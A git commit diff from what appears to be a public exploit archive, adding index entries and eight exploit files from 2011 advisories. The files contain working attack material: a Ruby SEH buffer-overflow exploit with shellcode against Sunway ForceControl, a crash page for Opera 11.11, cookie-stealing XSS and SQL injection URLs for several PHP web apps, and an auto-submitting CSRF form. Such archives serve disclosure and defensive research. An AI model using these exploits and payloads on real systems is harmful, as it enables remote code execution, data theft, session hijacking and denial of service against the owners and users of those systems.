Update: 2015-01-23
8 new exploits
This commit is contained in:
parent
cdb1e00bef
commit
dc7ad96825
9 changed files with 201 additions and 1 deletions
10
files.csv
10
files.csv
|
@ -32192,7 +32192,7 @@ id,file,description,date,author,platform,type,port
|
||||||
35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
|
35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
|
||||||
35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
|
35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
|
||||||
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
|
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
|
||||||
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Dave,php,webapps,80
|
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Technidev,php,webapps,80
|
||||||
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
|
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
|
||||||
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
|
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
|
||||||
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
|
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
|
||||||
|
@ -32303,3 +32303,11 @@ id,file,description,date,author,platform,type,port
|
||||||
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
|
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
|
||||||
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
|
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
|
||||||
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
|
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
|
||||||
|
35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 Denial of Service Vulnerability",2011-06-14,echo,multiple,dos,0
|
||||||
|
35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
|
||||||
|
35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
|
||||||
|
35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
|
||||||
|
35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0
|
||||||
|
35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
|
||||||
|
35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
|
||||||
|
35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
34
platforms/multiple/dos/35856.html
Executable file
34
platforms/multiple/dos/35856.html
Executable file
|
@ -0,0 +1,34 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48262/info
|
||||||
|
|
||||||
|
The Opera Web Browser is prone to a denial-of-service vulnerability.
|
||||||
|
|
||||||
|
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
|
||||||
|
|
||||||
|
Opera Web Browser 11.11 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
|
||||||
|
<script type="text/javascript" language="javascript">
|
||||||
|
|
||||||
|
/*
|
||||||
|
*
|
||||||
|
* Opera 11.11 Remote Crash
|
||||||
|
* Software link: http://www.opera.com/download/
|
||||||
|
* Tested on: Win32 xp home sp 3
|
||||||
|
* CVE : null
|
||||||
|
*
|
||||||
|
* Im too lazy to deep analyze this ,but i thing is just unexploitable crash
|
||||||
|
* so f****jixvt
|
||||||
|
* ( dla klechis?awa i jego kosiarki :i )
|
||||||
|
*
|
||||||
|
*/
|
||||||
|
|
||||||
|
var a = window.document.getElementById('bo0om');
|
||||||
|
var b = a.contentDocument.createElement('font');
|
||||||
|
a.src='about:blank';
|
||||||
|
setTimeout('b.face = "h3h";',500);
|
||||||
|
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
10
platforms/php/webapps/35861.txt
Executable file
10
platforms/php/webapps/35861.txt
Executable file
|
@ -0,0 +1,10 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48280/info
|
||||||
|
|
||||||
|
vBTube is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||||
|
|
||||||
|
vBTube 1.2.9 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/cy/vBTube.php?page=1&do=user&uname="><script>alert(1);</script>
|
||||||
|
http://www.example.com/forum/vBTube.php?do=view&vidid=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
32
platforms/php/webapps/35862.txt
Executable file
32
platforms/php/webapps/35862.txt
Executable file
|
@ -0,0 +1,32 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48281/info
|
||||||
|
|
||||||
|
miniblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||||
|
|
||||||
|
miniblog 1.0.0 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
|
||||||
|
http://www.example.com/adm/login.php?error_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
|
||||||
|
http://www.example.com/adm/options.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
|
||||||
|
http://www.example.com/adm/password.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
|
||||||
|
http://www.example.com/adm/edit.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
http://www.example.com/adm/edit.php?mode=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||||||
|
|
||||||
|
|
||||||
|
<form action="http://www.example.com/adm/admin.php?mode=add&id=" method="post">
|
||||||
|
<input type="hidden" name="data[post_title]" value="csrf">
|
||||||
|
<input type="hidden" name="data[post_content]" value="csrf">
|
||||||
|
<input type="hidden" name="data[published]" value="1">
|
||||||
|
<input type="hidden" name="miniblog_PostBack" value="Add">
|
||||||
|
<input type="submit" id="btn">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.getElementById('btn').click();
|
||||||
|
</script>
|
||||||
|
|
||||||
|
|
27
platforms/php/webapps/35863.php
Executable file
27
platforms/php/webapps/35863.php
Executable file
|
@ -0,0 +1,27 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48317/info
|
||||||
|
|
||||||
|
myBloggie is prone to a SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
|
||||||
|
|
||||||
|
myBloggie 2.1.6 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
<?php
|
||||||
|
//trackback.php - Line 33 - 35
|
||||||
|
$url=urldecode($_REQUEST['url']);
|
||||||
|
if (validate_url($url)==false) { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>"); }
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
<?php
|
||||||
|
//trackback.php - Line 750
|
||||||
|
function validate_url($url) {
|
||||||
|
if ( ! preg_match('#^http\\:\\/\\/[a-z0-9\-]+\.([a-z0-9\-]+\.)?[a-z]+#i', $url, $matches) ) {
|
||||||
|
return false;
|
||||||
|
} else {
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
10
platforms/php/webapps/35865.txt
Executable file
10
platforms/php/webapps/35865.txt
Executable file
|
@ -0,0 +1,10 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48339/info
|
||||||
|
|
||||||
|
Nibbleblog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||||
|
|
||||||
|
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
Nibbleblog 3.0 is affected; other versions may also be vulnerable.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?page=[SQLi]
|
||||||
|
http://www.example.com/post.php?idpost=[SQLi]
|
17
platforms/php/webapps/35866.txt
Executable file
17
platforms/php/webapps/35866.txt
Executable file
|
@ -0,0 +1,17 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48341/info
|
||||||
|
|
||||||
|
Immophp is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
|
||||||
|
|
||||||
|
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
Immophp 1.1.1 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
SQL-injection:
|
||||||
|
|
||||||
|
http://www.example.com/index.php?page=-2%20uniuon%20select%201,2,3,version(),5--
|
||||||
|
http://www.example.com/annonce_detail.php?annonce=-2%20union%20all%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%
|
||||||
|
|
||||||
|
Cross-site scripting:
|
||||||
|
|
||||||
|
http://www.example.com/annonce.php?secteur= %3cscript%3ealert%3c'31337'%3e%3b%3c%2fscript%3e
|
||||||
|
|
9
platforms/php/webapps/35867.txt
Executable file
9
platforms/php/webapps/35867.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48342/info
|
||||||
|
|
||||||
|
Taha Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||||
|
|
||||||
|
Taha Portal 3.2 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/index.asp?id=3&serword=%3Cscript%3Ealert%28%22sss%22%29;%3C/script%3E
|
53
platforms/windows/remote/35864.txt
Executable file
53
platforms/windows/remote/35864.txt
Executable file
|
@ -0,0 +1,53 @@
|
||||||
|
source: http://www.securityfocus.com/bid/48328/info
|
||||||
|
|
||||||
|
Sunway ForceControl is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
|
||||||
|
|
||||||
|
Attackers can exploit these issues to execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition.
|
||||||
|
|
||||||
|
def send(packet)
|
||||||
|
begin
|
||||||
|
sock = TCPSocket.new(@ip, @port)
|
||||||
|
sock.write(packet)
|
||||||
|
rescue Exception => e
|
||||||
|
return false
|
||||||
|
else
|
||||||
|
resp = sock.recv(1024)
|
||||||
|
sock.close
|
||||||
|
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
@ip = ARGV[0]
|
||||||
|
@port = 80
|
||||||
|
|
||||||
|
# windows/exec CMD=calc.exe
|
||||||
|
shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
|
||||||
|
"\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
|
||||||
|
"\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
|
||||||
|
"\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
|
||||||
|
"\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
|
||||||
|
"\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
|
||||||
|
"\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
|
||||||
|
"\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
|
||||||
|
"\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
|
||||||
|
"\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
|
||||||
|
"\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
|
||||||
|
"\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
|
||||||
|
"\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
|
||||||
|
"\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
|
||||||
|
"\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
|
||||||
|
"\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
|
||||||
|
"\x82\xc5\x65"
|
||||||
|
|
||||||
|
payload = "H" * 1599
|
||||||
|
payload << "\xeb\x06\x90\x90" # Pointer to Next SE Handler
|
||||||
|
payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
|
||||||
|
payload << "\x90" * 40
|
||||||
|
payload << shellcode
|
||||||
|
payload << "\x90" * (4058 - shellcode.length)
|
||||||
|
|
||||||
|
pack = "GET /#{payload} HTTP/1.1\r\n"
|
||||||
|
pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"
|
||||||
|
|
||||||
|
puts "packet sended." if send(pack)
|
Loading…
Add table
Reference in a new issue